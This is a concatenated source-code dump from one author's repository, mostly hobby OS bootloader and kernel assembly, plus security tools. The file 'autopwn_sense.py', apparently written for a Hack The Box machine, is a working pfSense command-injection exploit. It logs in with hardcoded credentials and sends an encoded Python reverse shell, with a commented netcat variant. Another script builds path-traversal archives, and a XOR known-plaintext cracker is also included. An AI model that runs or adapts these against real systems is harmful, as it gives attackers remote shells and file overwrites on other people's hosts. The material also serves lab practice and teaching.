127 ; (max sectors to read in one call = 127) 49 | jbe .good_size 50 | pusha 51 | mov cx, 127 52 | call Real_mode_read_disk 53 | popa 54 | add eax, 127 55 | add dx, 127 * 512 / 16 56 | sub cx, 127 57 | jmp .start 58 | 59 | .good_size: 60 | mov [DAP.LBA_lower], ax 61 | mov [DAP.num_sectors], cx 62 | mov [DAP.buf_segment], dx 63 | mov [DAP.buf_offset], bx 64 | mov dl, [disk] 65 | mov si, DAP 66 
| mov ah, 0x42 67 | int 0x13 68 | jc .print_error 69 | ret 70 | .print_error: 71 | mov si, disk_error_message 72 | call Real_mode_println 73 | .halt: hlt 74 | jmp .halt; Infinite loop. We cannot recover from disk error. 75 | -------------------------------------------------------------------------------- /outlook/get_outlook_forwarding_rules.ps1: -------------------------------------------------------------------------------- 1 | #Requires -version 2.0 2 | #Author: Alamot 3 | Add-Type -AssemblyName microsoft.office.interop.outlook 4 | $outlook = New-Object -ComObject outlook.application 5 | $namespace = $Outlook.GetNameSpace("mapi") 6 | 7 | 8 | # See https://docs.microsoft.com/en-us/office/vba/api/outlook.olruleactiontype 9 | $ACTIONS_TO_GRAB = @(6, 7, 8) 10 | # 6 => olRuleActionForward 11 | # 7 => olRuleActionForwardAsAttachment 12 | # 8 => olRuleActionRedirect 13 | 14 | 15 | [Hashtable[]]$records = $null 16 | 17 | ForEach ($store in $namespace.Stores) { 18 | 19 | $records += @{} 20 | $records[-1]['CurrentUser'] = $namespace.CurrentUser.Name 21 | $records[-1]['DisplayName'] = $store.DisplayName 22 | $records[-1]['FilePath'] = $store.FilePath 23 | $records[-1]['Rules'] = $() 24 | 25 | $rules = $store.GetRules() 26 | 27 | ForEach ($rule in $rules) { 28 | 29 | if ($rule.Enabled) { 30 | 31 | $actions_to_grab_found = 0 32 | ForEach ($action in $rule.Actions) { 33 | if ($action.Enabled -and ($ACTIONS_TO_GRAB -contains $action.ActionType)) { 34 | $actions_to_grab_found = 1 35 | } 36 | } 37 | 38 | if ($actions_to_grab_found -eq 1) { 39 | 40 | $records[-1]['Rules'] += , @{} 41 | $records[-1]['Rules'][-1]['name'] = $rule.Name 42 | $records[-1]['Rules'][-1]['conditions'] = @() 43 | $records[-1]['Rules'][-1]['actions'] = @() 44 | 45 | ForEach ($condition in $rule.Conditions) { 46 | if ($condition.Enabled) { 47 | # https://docs.microsoft.com/en-us/office/vba/api/outlook.olruleconditiontype 48 | $s = "type:" + $condition.ConditionType.toString() 49 | if ("Text" -in 
$condition.PSobject.Properties.Name) {
                            $s += ", text:" + $condition.Text;
                        }
                        if ("Recipients" -in $condition.PSobject.Properties.Name) {
                            $s += ", recipients:" +
                                  (($condition.Recipients | select -expand Name) -join ';')
                        }
                        $records[-1]['Rules'][-1]['conditions'] += , $s
                    }
                }

                # Only enabled actions of the types listed in $ACTIONS_TO_GRAB are recorded.
                ForEach ($action in $rule.Actions) {
                    if ($action.Enabled -and ($ACTIONS_TO_GRAB -contains $action.ActionType)) {
                        $s = "type:" + $action.ActionType.toString() + ", recipients:" +
                             (($action.Recipients | select -expand Name) -join ';')
                        $records[-1]['Rules'][-1]["actions"] += , $s
                    }
                }

            }

        }
    }
}


# Emit the collected records (one per Outlook store) as JSON on stdout.
$records | ConvertTo-Json -Depth 10

# Uncomment the following lines and set the proper path to write the output into a file
# $outfile = join-path -path "\\Tcom2\shared" -childpath $($env:COMPUTERNAME + "-" + $(Get-Date -UFormat "%Y-%m-%d") + ".json")
# $records | ConvertTo-Json -Depth 10 | Set-Content $outfile
-------------------------------------------------------------------------------- /path_traversal/path_traversal_archiver.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# Author: Alamot
import os
import sys
import zipfile
import tarfile
import argparse


# Archive open mode per extension: the zip family and plain .tar are opened in
# append mode ("a"), the compressed tar variants in write mode, so an existing
# .gz/.tgz/.bz2 archive is overwritten while an existing .zip/.tar is extended.
mode = {".zip":"a", ".jar":"a", ".war":"a", ".apk":"a",
        ".tar":"a", ".gz":"w:gz", ".tgz":"w:gz", ".bz2":"w:bz2"}


def make_traversal_path(path, level=0, os="unix"):
    """Prefix ``path`` with ``level`` parent-directory components.

    Builds the member name used when testing an archive extractor for
    path-traversal handling (e.g. level=2 gives ``../../<path>`` on unix and
    ``..\\..\\<path>`` on win).

    Args:
        path: Relative path of the file inside the archive.
        level: Number of ``..`` components to prepend; 0 returns ``path`` with
            only the separator normalisation applied.
        os: Target convention - ``"win"`` for backslashes, anything else for
            forward slashes. Note this parameter shadows the ``os`` module
            inside the function (harmless here: the module is not used in it).

    Returns:
        The traversal path as a str with separators converted to the target
        OS; a doubled separator is collapsed to a single one.
    """
    if os == "win":
        traversal = ".." + "\\"
        fullpath = traversal*level + path
        return fullpath.replace('/', '\\').replace('\\\\', '\\')
    else:
        traversal = ".."
+ "/" 21 | fullpath = traversal*level + path 22 | return fullpath.replace('\\', '/').replace('//', '/') 23 | 24 | 25 | def main(): 26 | parser = argparse.ArgumentParser(description="A tool to create archives " + 27 | "containing path-traversal filenames (e.g. '../../etc/passwd').") 28 | parser.add_argument("file_to_add", help="File to add in the archive.") 29 | parser.add_argument("archive", 30 | help="Archive filename (Supported extensions are " + 31 | ".zip, .jar, .war, .apk, " + 32 | ".tar, .tar.bz2, .tar.gz, .tgz).") 33 | parser.add_argument("-l", "--levels", dest="levels", default="0-10", 34 | help="A single level or a range of levels to " + 35 | "traverse (default: %(default)s).") 36 | parser.add_argument("-o", "--os", dest="os", default="unix", 37 | help="Target OS [unix|win] (default: %(default)s).") 38 | parser.add_argument("-p", "--path", dest="path", default="", 39 | help="Path to include (e.g. 'etc/').") 40 | args = parser.parse_args() 41 | 42 | if not os.path.exists(args.file_to_add): 43 | sys.exit("Cannot find input file: " + args.file_to_add) 44 | 45 | name, ext = os.path.splitext(args.archive) 46 | if not ext: 47 | sys.exit("Please specify a supported extention (zip, jar, " + 48 | "tar, tar.bz2, tar.gz, tgz) in the archive filename: " + 49 | args.archive) 50 | 51 | try: 52 | if "-" not in args.levels: 53 | start = int(args.levels) 54 | end = int(args.levels) + 1 55 | else: 56 | start, end = args.levels.split("-") 57 | start = int(start) 58 | end = int(end) + 1 59 | except ValueError: 60 | sys.exit("Please specify a single level (e.g. 3) or " + 61 | "a level range (e.g. 
1-10) for path traversal.") 62 | 63 | path = args.path + os.path.basename(args.file_to_add) 64 | 65 | if ext in [".zip", ".jar", ".war", ".apk"]: 66 | print("Creating archive " + args.archive) 67 | zipf = zipfile.ZipFile(args.archive, mode[ext]) 68 | for i in range(start, end): 69 | fullpath = make_traversal_path(path, level=i, os=args.os) 70 | print("[+] Adding " + fullpath) 71 | zipf.write(args.file_to_add, fullpath) 72 | zipf.close() 73 | elif ext in [".tar", ".bz2", ".gz", ".tgz"]: 74 | print("Creating archive " + args.archive) 75 | tarf = tarfile.open(args.archive, mode[ext]) 76 | for i in range(start, end): 77 | fullpath = make_traversal_path(path, level=i, os=args.os) 78 | print("[+] Adding " + fullpath) 79 | tarf.add(args.file_to_add, fullpath) 80 | tarf.close() 81 | else: 82 | sys.exit("Extention '" + ext + "' not supported.") 83 | 84 | 85 | if __name__ == '__main__': 86 | main() 87 | -------------------------------------------------------------------------------- /enum/htbscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Author: Alamot 3 | import argparse 4 | import re 5 | import subprocess 6 | import sys 7 | 8 | 9 | def run_command(command): 10 | print("\nRunning command: "+' '.join(command)) 11 | sp = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) 12 | output = "" 13 | while True: 14 | out = sp.stdout.read(1).decode('utf-8') 15 | if out == '' and sp.poll() != None: 16 | break 17 | if out != '': 18 | output += out 19 | sys.stdout.write(out) 20 | sys.stdout.flush() 21 | return output 22 | 23 | 24 | def enum(ip, ports, max_rate, outfile=None): 25 | # Running masscan 26 | cmd = ["sudo", "masscan", "-e", "tun0", "-p" + ports, 27 | "--max-rate", str(max_rate), "--interactive", ip] 28 | output = run_command(cmd) 29 | if outfile: 30 | for line in output.splitlines(): 31 | if "rate:" not in line: # Don't write 'rate:' lines 32 | outfile.write(line + 
"\n") 33 | outfile.flush() 34 | 35 | # Get discovered TCP ports from the masscan output, sort them and run nmap for those 36 | results = re.findall('port (\d*)/tcp', output) 37 | if results: 38 | tcp_ports = list({int(port) for port in results}) 39 | tcp_ports.sort() 40 | tcp_ports = ''.join(str(tcp_ports)[1:-1].split()) 41 | # Running nmap 42 | cmd = ["sudo", "nmap", "-A", "-p"+tcp_ports, ip] 43 | output = run_command(cmd) 44 | if outfile: 45 | outfile.write(output) 46 | outfile.flush() 47 | 48 | # Get discovered UDP ports from the masscan output, sort them and run nmap for those 49 | results = re.findall('port (\d*)/udp', output) 50 | if results: 51 | udp_ports = list({int(port) for port in results}) 52 | udp_ports.sort() 53 | udp_ports = ''.join(str(udp_ports)[1:-1].split()) 54 | # Running nmap 55 | cmd = ["sudo", "nmap", "-A", "-sU", "-p"+udp_ports, ip] 56 | output = run_command(cmd) 57 | if outfile: 58 | outfile.write(output) 59 | outfile.flush() 60 | 61 | 62 | def main(): 63 | parser = argparse.ArgumentParser(description="Port/Service enumaration tool.") 64 | parser.add_argument("IP", help="IP address to scan.") 65 | parser.add_argument("-tp", "--tcp-ports", dest="tcp_ports", default="1-65535", help="List of ports/port ranges to scan (TCP only).") 66 | parser.add_argument("-up", "--udp-ports", dest="udp_ports", default="1-65535", help="List of ports/port ranges to scan (UDP only).") 67 | parser.add_argument("-r", "--max-rate", dest="max_rate", default=500, type=int, help="Send packets no faster than per second") 68 | parser.add_argument("-o", "--output", dest="outfile", help="File to write output to.") 69 | args = parser.parse_args() 70 | 71 | # Construct ports string 72 | ports = "" 73 | tcp = args.tcp_ports and args.tcp_ports.lower() not in ["0", "None"] 74 | udp = args.udp_ports and args.udp_ports.lower() not in ["0", "None"] 75 | if tcp: 76 | ports += args.tcp_ports 77 | if tcp and udp: 78 | ports += "," 79 | if udp: 80 | ports += "U:" + args.udp_ports 81 
| 82 | # Write to file? 83 | if args.outfile: 84 | with open(args.outfile, "at") as outfile: 85 | enum(args.IP, ports, args.max_rate, outfile) 86 | else: 87 | enum(args.IP, ports, args.max_rate) 88 | 89 | 90 | if __name__ == "__main__": 91 | main() 92 | -------------------------------------------------------------------------------- /raspberry_pi_os/part1/boot.S: -------------------------------------------------------------------------------- 1 | // A 64-bit (AArch64) kernel for the Raspberry Pi. 2 | // Author: Alamot 3 | 4 | /******************************************************************************/ 5 | /* A note of caution */ 6 | /******************************************************************************/ 7 | /* When programming in ARM AArch64 assembly, it is important to exercise */ 8 | /* caution regarding both control flow and data alignment. */ 9 | /* */ 10 | /* Unlike x86, where the return address is automatically pushed onto the */ 11 | /* stack by the CALL instruction, ARM uses the link register (x30 aka lr) */ 12 | /* to store the return address. This means that each BL (Branch with Link) */ 13 | /* overwrites the previous value of x30. If a function makes another BL call */ 14 | /* without first saving the content of the link register (for example, */ 15 | /* by pushing it onto the stack), the original return address will be lost */ 16 | /* forever, causing return to a wrong place. */ 17 | /* */ 18 | /* Be also mindful of data alignment requirements when accessing memory. */ 19 | /* Many load and store instructions require the addresses to be aligned to */ 20 | /* specific boundaries (e.g. LDHR (Load halfword) needs a 2-byte alignment). */ 21 | /* Misaligned accesses can cause alignment faults or degrade performance. */ 22 | /* Ensuring proper alignment of data structures and using alignment */ 23 | /* directives (.aling) where necessary helps maintain both correctness and */ 24 | /* efficiency. 
*/ 25 | /******************************************************************************/ 26 | 27 | 28 | /*---Initialized-data---------------------------------------------------------*/ 29 | .section ".rodata" // Read only data section 30 | .align 2 // ARM load/store instructions need properly aligned data, otherwise they fault (see the note above). 31 | hello_msg: .short 14 // The length of the string (16 bits). 32 | .ascii "Hello, world!\n" // We don't use null-terminated strings. 33 | 34 | /*---Code---------------------------------------------------------------------*/ 35 | .section ".text" 36 | .global _start 37 | _start: 38 | /* Read this CPU core's ID */ 39 | mrs x1, MPIDR_EL1 // Read Multiprocessor Affinity Register. 40 | and x1, x1, #3 // Mask to get just the CPU core ID (0-3). 41 | cbz x1, core0 // If ID is 0, branch to core0. 42 | b halt // If not Core 0, put it to sleep. 43 | 44 | core0: 45 | ldr x1, =__stack_top 46 | mov sp, x1 // We set our stack pointer to __stack_top address 47 | mov x2, 5 // Counter = 5 (i.e. send the message five times) 48 | main: 49 | ldr x20, =hello_msg // Load the address of the message into x20 50 | bl uart_puts // Send the message to UART (BL clobbers x30/lr; harmless here because _start never returns). 51 | subs x2, x2, #1 // Decrease counter 52 | bne main // Loop until the message counter (x2) reaches 0. 53 | halt: /* Infinite loop. */ 54 | wfe // Wait For Event: This is a low-power sleep/halt instruction. 55 | b halt // It prevents us from going off in memory and executing junk. 56 | 57 | 58 | /*---Uninitialized-data-------------------------------------------------------*/ 59 | .section ".bss" // Allocate uninitialized space (in linker.ld) for the stack. 60 | 61 | -------------------------------------------------------------------------------- /crypto/xorknown.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # Author: Alamot 3 | # This is a XOR plaintext attack tool: If we know a part of the plaintext maybe 4 | # we can recover the key and the whole text. 
5 | from __future__ import print_function 6 | from __future__ import division 7 | import string, sys 8 | 9 | 10 | ignore_code = 0xff 11 | printable_key = True 12 | max_key_length = 21 13 | 14 | 15 | def is_printable(text, ignore_code): 16 | ''' Function to check if every character in text is printable ''' 17 | for ch in text: 18 | if ord(ch) == ignore_code: 19 | continue 20 | if ch not in string.printable: 21 | return False 22 | return True 23 | 24 | 25 | def lrotate(s, d): 26 | ''' Function to rotate string left by d length ''' 27 | return s[d:] + s[0:d] 28 | 29 | 30 | if len(sys.argv) < 2 or sys.argv[1].strip().lower() == "--help": 31 | print("Known-plaintext attack:\n"+sys.argv[0]+" [max_key_length]") 32 | print("\nDecrypt using known key:\n"+sys.argv[0]+" --key=the_known_key") 33 | exit() 34 | 35 | filename = sys.argv[1] 36 | 37 | if sys.argv[2].strip().lower()[:5] == "--key": 38 | known_key = sys.argv[2].strip()[6:] 39 | with open(filename, "rb") as f: 40 | data = f.read() 41 | decrypted_text = "" 42 | repeated_key = (known_key)*((len(data) // len(known_key)) + 1) 43 | for x in range(len(data)): 44 | decrypted_text += chr(ord(data[x]) ^ ord(repeated_key[x])) 45 | print("Key length: "+str(len(known_key)), "\nPartial Key: "+known_key, "\nPlaintext: "+decrypted_text) 46 | exit() 47 | else: 48 | known_plaintext = sys.argv[2] 49 | 50 | if len(known_plaintext) > max_key_length: 51 | print("The length of the known plaintext is greater than max_key_length (="+str(max_key_length)+"). 
Please give a smaller plaintext or incrase max_key_length.") 52 | exit() 53 | 54 | if len(sys.argv) > 3: 55 | max_key_length = int(sys.argv[3])+1 56 | 57 | with open(filename, "rb") as f: 58 | data = f.read() 59 | 60 | print("Searching XOR-encrypted "+filename+" for string '"+known_plaintext+"' (max_key_length = "+str(max_key_length-1)+")") 61 | 62 | try: 63 | for i in range(len(data)-len(known_plaintext)): # Try known plaintext in every position 64 | partial_key = "" 65 | for j in range(len(known_plaintext)): 66 | if known_plaintext[j] == ignore_code: 67 | partial_key += chr(ignore_code) 68 | else: 69 | partial_key += chr(ord(data[i+j]) ^ ord(known_plaintext[j])) 70 | #print("Single key: "+partial_key) 71 | if is_printable(partial_key, ignore_code) or not printable_key: 72 | for n in range(len(partial_key), max_key_length): # Try different key lengths 73 | for m in range(n): # Try different partial key positions 74 | expanded_key = lrotate(partial_key+chr(ignore_code)*(n-len(partial_key)), m) 75 | #print(expanded_key, m) 76 | repeated_key = (expanded_key)*((len(data) // len(expanded_key)) + 1) 77 | decrypted_text = "" 78 | for x in range(len(data)): # Try to decrypt the encoded text 79 | if ord(repeated_key[x]) == ignore_code: 80 | decrypted_text += chr(ignore_code) 81 | else: 82 | decrypted_text += chr(ord(data[x]) ^ ord(repeated_key[x])) 83 | if is_printable(decrypted_text, ignore_code): # Is the whole result printable? 84 | if known_plaintext in decrypted_text: 85 | print("Key length: "+str(len(expanded_key)), "\nPartial Key: "+expanded_key, "\nPlaintext: "+decrypted_text) 86 | print("") 87 | except KeyboardInterrupt: 88 | print("\nCtrl+C received. Exiting...") 89 | exit() 90 | -------------------------------------------------------------------------------- /os/part4/kernel/kernel.asm: -------------------------------------------------------------------------------- 1 | BITS 64 ; We have entered the long mode! 
:) 2 | 3 | ;---Define---------------------------------------------------------------------- 4 | %define DATA_SEG 0x0010 5 | 6 | ;---Initialized data------------------------------------------------------------ 7 | hello_world_message dw 12 8 | db 'Hello World!' 9 | ticks_message dw 20 10 | db 'System timer ticks: ' 11 | scancode_message dw 20 12 | db 'Keyboard scan code: ' 13 | task1_message dw 6 14 | db "Task 1" 15 | task2_message dw 6 16 | db "Task 2" 17 | task3_message dw 6 18 | db "Task 3" 19 | 20 | ;---Include--------------------------------------------------------------------- 21 | %include "kernel/video.asm" 22 | %include "kernel/idt.asm" 23 | %include "kernel/isr.asm" 24 | %include "kernel/tasking.asm" 25 | 26 | ;---Code------------------------------------------------------------------------ 27 | Kernel: 28 | lidt [IDTR] ; Load our IDTR 29 | 30 | mov al, 0x80 ; OCW1 (interrupt mask register): only bit 7 set, i.e. IRQ7 masked and IRQ0-6 enabled at the master PIC. 31 | out PIC1_DATA, al 32 | mov al, 0x80 ; OCW1 (interrupt mask register): only bit 7 set, i.e. IRQ15 masked and IRQ8-14 enabled at the slave PIC. 33 | out PIC2_DATA, al 34 | 35 | ; Set all segments registers to DATA_SEG. 36 | mov ax, DATA_SEG 37 | mov ds, ax 38 | mov es, ax 39 | mov fs, ax 40 | mov gs, ax 41 | mov ss, ax 42 | 43 | ; Clear the screen. 44 | mov rax, 0x0020002000200020 ; Set background color to black (0) and 45 | ; character to blank space (20). 46 | call Fill_screen 47 | 48 | ; Print "Hello World!" at the upper right corner. 49 | mov ah, 0x1E ; VGA attribute byte: high nibble = background (1), low nibble = foreground (0xE). 50 | mov r8, 69 ; Column (the 12-char message ends at the right edge of an 80-column screen). 51 | mov r9, 1 ; Row. 52 | mov rsi, hello_world_message 53 | call Print 54 | 55 | ; Initialize general stack allocation to the current rsp value. 56 | mov [stack_allocation], rsp 57 | 58 | ; Create three tasks. 59 | mov rsi, Task1 60 | call Create_task 61 | mov rsi, Task2 62 | call Create_task 63 | mov rsi, Task3 64 | call Create_task 65 | 66 | ; Set active the first task slot 67 | mov qword [active_task_slot], 0 68 | 69 | ; Task 1: We print system timer ticks and keyboard scan code. (There is no jmp/call here, so Kernel falls straight through into Task1 below.) 
70 | Task1: 71 | mov ah, (VGA_COLOR_DARK_GREY << 4) | VGA_COLOR_WHITE 72 | mov r8, 1 73 | mov r9, 2 74 | mov rsi, task1_message 75 | Call Print 76 | mov r8, 1 77 | mov r9, 3 78 | mov rsi, ticks_message 79 | Call Print 80 | mov r8, 1 81 | mov r9, 4 82 | mov rsi, scancode_message 83 | Call Print 84 | .loop: 85 | ; Print system timer ticks. 86 | mov r8, 21 87 | mov r9, 3 88 | mov r10, [systimer_ticks] 89 | call Print_hex 90 | ; Print keyboard scan code. 91 | mov r8, 21 92 | mov r9, 4 93 | mov r10, [keyboard_scancode] 94 | call Print_hex 95 | jmp Task1.loop 96 | 97 | ; Task 2: We set r10 to 0 and we increase it by one in a loop. 98 | Task2: 99 | mov ah, (VGA_COLOR_GREEN << 4) | VGA_COLOR_WHITE 100 | mov r8, 1 101 | mov r9, 6 102 | mov rsi, task2_message 103 | Call Print 104 | mov r8, 1 105 | mov r9, 7 106 | mov r10, 0 107 | .loop: 108 | inc r10 109 | ; Print number of ticks 110 | Call Print_hex 111 | jmp Task2.loop 112 | 113 | ; Task 3: We set r10 to 0xFFFFFFFFFFFFFFFF and we decrease it by one in a loop. 
114 | Task3: 115 | mov ah, (VGA_COLOR_MAGENTA << 4) | VGA_COLOR_WHITE 116 | mov r8, 1 117 | mov r9, 9 118 | mov rsi, task3_message 119 | Call Print 120 | mov r8, 1 121 | mov r9, 10 122 | mov r10, 0xFFFFFFFFFFFFFFFF 123 | .loop: 124 | dec r10 125 | ; Print number of ticks 126 | Call Print_hex 127 | jmp Task3.loop 128 | -------------------------------------------------------------------------------- /hacking/HTB/Sense/autopwn_sense.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # Author: Alamot (Antonios Tsolis) 3 | import re 4 | import sys 5 | import time 6 | from pwn import * 7 | import signal, thread 8 | import requests, urllib3 9 | signal.signal(signal.SIGINT, signal.SIG_DFL) 10 | 11 | DEBUG = False 12 | RHOST="10.10.10.60" 13 | RPORT=443 14 | LHOST="10.10.14.5" 15 | LPORT=60001 16 | 17 | if DEBUG: 18 | context.log_level = 'debug' 19 | else: 20 | context.log_level = 'info' 21 | 22 | def send_ptyshell_payload(): 23 | #stager = "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc " + str(LHOST) + " " + str(LPORT) + " > /tmp/f" 24 | stager = "python -c \"import os, pty, socket; lhost = '"+ str(LHOST) + "'; lport = " + str(LPORT) + "; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv('HISTFILE','/dev/null'); pty.spawn('/bin/sh'); s.close(); exit()\"" 25 | encoded_stager = "" 26 | for c in stager: 27 | encoded_stager += "\\\\%03d" %(int(oct(ord(c)))) 28 | time.sleep(1) 29 | 30 | client = None 31 | try: 32 | urllib3.disable_warnings() 33 | client = requests.session() 34 | client.verify = False 35 | client.keep_alive = False 36 | 37 | # Retrieve the CSRF token first 38 | p1=log.progress("Connecting to get csrf token") 39 | response = client.get("https://"+str(RHOST)+":"+str(RPORT), timeout=20) 40 | if response.status_code != 200: 41 | p1.failure("Status "+str(response.status_code)) 42 
| sys.exit() 43 | csrf = re.search('csrfMagicToken\s*=\s*"(sid:\w+,\d+)', response.text).group(1) 44 | p1.success("csrfMagicToken = " + csrf) 45 | 46 | # Login 47 | p2=log.progress("Logging in") 48 | data={"__csrf_magic":csrf, "usernamefld":"rohit", "passwordfld":"pfsense", "login":"Login"} 49 | response = client.post("https://"+str(RHOST)+":"+str(RPORT)+"/index.php", data=data, timeout=20) 50 | if response.status_code != 200: 51 | p1.failure("Status "+str(response.status_code)) 52 | sys.exit() 53 | p2.success("Status "+str(response.status_code)) 54 | 55 | # Send payload 56 | p3=log.progress("Sending pty shell payload...") 57 | try: 58 | params={"database":"-throughput.rrd", "graph":"file|printf "+encoded_stager+"|sh|echo "} 59 | response = client.get("https://"+str(RHOST)+":"+str(RPORT)+"/status_rrd_graph_img.php", params=params, timeout=20) 60 | if response.status_code != 200: 61 | p3.failure("Status "+str(response.status_code)) 62 | sys.exit() 63 | except requests.exceptions.Timeout as e: 64 | p3.success("OK") 65 | 66 | except requests.exceptions.RequestException as e: 67 | log.failure(str(e)) 68 | 69 | finally: 70 | if client: 71 | client.close() 72 | log.success("Web thread exited successfully.") 73 | 74 | try: 75 | threading.Thread(target=send_ptyshell_payload).start() 76 | except Exception as e: 77 | log.error(str(e)) 78 | ptyshell = listen(LPORT, timeout=20).wait_for_connection() 79 | if ptyshell.sock is None: 80 | log.failure("Connection timeout.") 81 | sys.exit() 82 | ptyshell.interactive() 83 | sys.exit() 84 | 85 | ''' 86 | https://10.0.0.145/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|command|echo%20 87 | 88 | https://10.0.0.145/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20OCTET_ENCODED_SHELLCODE|sh|echo%20 89 | 90 | GET 
/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20\\156\\143\\040\\061\\060\\056\\061\\060\\056\\061\\064\\056\\061\\066\\060\\040\\066\\060\\060\\060\\060\\040\\074\\040\\057\\150\\157\\155\\145\\057\\162\\157\\150\\151\\164\\057\\165\\163\\145\\162\\056\\164\\170\\164 91 | |sh|echo%20 HTTP/1.1 92 | Host: 10.0.0.145 93 | Accept: */* 94 | Accept-Language: en 95 | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 96 | Cookie: PHPSESSID=28530634f9c99cd400bd73b28b812482 97 | Connection: close 98 | ''' 99 | -------------------------------------------------------------------------------- /os/part3/stage2/paging.asm: -------------------------------------------------------------------------------- 1 | BITS 16 2 | 3 | ;---Define---------------------------------------------------------------------- 4 | %define PAGE_PRESENT (1 << 0) 5 | %define PAGE_WRITE (1 << 1) 6 | %define CODE_SEG 0x0008 7 | %define PAGING_DATA 0x9000 8 | 9 | ;---Initialized data------------------------------------------------------------ 10 | 11 | ;****************************************************************************************; 12 | ; Global Descriptor Table (GDT) ; 13 | ;****************************************************************************************; 14 | ; The Global Descriptor Table (GDT) is a data structure used by x86-family processors ; 15 | ; (starting with the 80286) in order to define the characteristics of the various memory ; 16 | ; areas (segments) used during program execution, including the base address, the size, ; 17 | ; and access privileges like executability and writability. ; 18 | ;****************************************************************************************; 19 | GDT: 20 | .Null: 21 | dq 0x0000000000000000 ; Null Descriptor (should be present). 22 | .Code: 23 | dq 0x00209A0000000000 ; 64-bit code descriptor (exec/read). 24 | dq 0x0000920000000000 ; 64-bit data descriptor (read/write). 
25 | ALIGN 4 26 | dw 0 ; Padding (to make the "address of the GDT" field aligned on a 4-byte boundary). 27 | .Pointer: 28 | dw $ - GDT - 1 ; 16-bit Size (Limit) of GDT. 29 | dd GDT ; 32-bit Base Address of GDT. (CPU will zero extend to 64-bit) 30 | 31 | 32 | ;---Code------------------------------------------------------------------------ 33 | Prepare_paging: 34 | ;*******************************************************************************************; 35 | ; Prepare paging ; 36 | ;-------------------------------------------------------------------------------------------; 37 | ; ES:EDI Should point to a valid page-aligned 16KiB buffer, for the PML4, PDPT, PD and a PT.; 38 | ; SS:ESP Should point to memory that can be used as a small (1 uint32_t) stack. ; 39 | ;*******************************************************************************************; 40 | mov edi, PAGING_DATA ; Point edi to a free space to create the paging structures. 41 | 42 | ; Zero out the 16KiB buffer. Since we are doing a rep stosd, count should be bytes/4. 43 | push di ; REP STOSD alters DI. 44 | mov ecx, 0x1000 45 | xor eax, eax 46 | cld 47 | rep stosd 48 | pop di ; Get DI back. 49 | 50 | ; Build the Page Map Level 4. ES:DI points to the Page Map Level 4 table. 51 | lea eax, [es:di + 0x1000] ; EAX = Address of the Page Directory Pointer Table. 52 | or eax, PAGE_PRESENT | PAGE_WRITE ; OR EAX with the flags (present flag, writable flag). 53 | mov [es:di], eax ; Store the value of EAX as the first PML4E. 54 | 55 | ; Build the Page Directory Pointer Table. 56 | lea eax, [es:di + 0x2000] ; Put the address of the Page Directory in to EAX. 57 | or eax, PAGE_PRESENT | PAGE_WRITE ; OR EAX with the flags (present flag, writable flag). 58 | mov [es:di + 0x1000], eax ; Store the value of EAX as the first PDPTE. 59 | 60 | ; Build the Page Directory. 61 | lea eax, [es:di + 0x3000] ; Put the address of the Page Table in to EAX. 
62 | or eax, PAGE_PRESENT | PAGE_WRITE ; OR EAX with the flags (present flag, writable flag). 63 | mov [es:di + 0x2000], eax ; Store to value of EAX as the first PDE. 64 | 65 | push di ; Save DI for the time being. 66 | lea di, [di + 0x3000] ; Point DI to the page table. 67 | mov eax, PAGE_PRESENT | PAGE_WRITE ; Move the flags into EAX - and point it to 0x0000. 68 | 69 | ; Build the Page Table. 70 | .LoopPageTable: 71 | mov [es:di], eax 72 | add eax, 0x1000 73 | add di, 8 74 | cmp eax, 0x200000 ; If we did all 2MiB, end. 75 | jb .LoopPageTable 76 | 77 | pop di ; Restore DI. 78 | ret 79 | -------------------------------------------------------------------------------- /os/part4/stage2/paging.asm: -------------------------------------------------------------------------------- 1 | BITS 16 2 | 3 | ;---Define---------------------------------------------------------------------- 4 | %define PAGE_PRESENT (1 << 0) 5 | %define PAGE_WRITE (1 << 1) 6 | %define CODE_SEG 0x0008 7 | %define PAGING_DATA 0xF000 8 | 9 | ;---Initialized data------------------------------------------------------------ 10 | 11 | ;****************************************************************************************; 12 | ; Global Descriptor Table (GDT) ; 13 | ;****************************************************************************************; 14 | ; The Global Descriptor Table (GDT) is a data structure used by x86-family processors ; 15 | ; (starting with the 80286) in order to define the characteristics of the various memory ; 16 | ; areas (segments) used during program execution, including the base address, the size, ; 17 | ; and access privileges like executability and writability. ; 18 | ;****************************************************************************************; 19 | GDT: 20 | .Null: 21 | dq 0x0000000000000000 ; Null Descriptor (should be present). 22 | .Code: 23 | dq 0x00209A0000000000 ; 64-bit code descriptor (exec/read). 
24 | dq 0x0000920000000000 ; 64-bit data descriptor (read/write). 25 | ALIGN 4 26 | dw 0 ; Padding (to make the "address of the GDT" field aligned on a 4-byte boundary). 27 | .Pointer: 28 | dw $ - GDT - 1 ; 16-bit Size (Limit) of GDT. 29 | dd GDT ; 32-bit Base Address of GDT. (CPU will zero extend to 64-bit) 30 | 31 | 32 | ;---Code------------------------------------------------------------------------ 33 | Prepare_paging: 34 | ;*******************************************************************************************; 35 | ; Prepare paging ; 36 | ;-------------------------------------------------------------------------------------------; 37 | ; ES:EDI Should point to a valid page-aligned 16KiB buffer, for the PML4, PDPT, PD and a PT.; 38 | ; SS:ESP Should point to memory that can be used as a small (1 uint32_t) stack. ; 39 | ;*******************************************************************************************; 40 | mov edi, PAGING_DATA ; Point edi to a free space to create the paging structures. 41 | 42 | ; Zero out the 16KiB buffer. Since we are doing a rep stosd, count should be bytes/4. 43 | push di ; REP STOSD alters DI. 44 | mov ecx, 0x1000 45 | xor eax, eax 46 | cld 47 | rep stosd 48 | pop di ; Get DI back. 49 | 50 | ; Build the Page Map Level 4. ES:DI points to the Page Map Level 4 table. 51 | lea eax, [es:di + 0x1000] ; EAX = Address of the Page Directory Pointer Table. 52 | or eax, 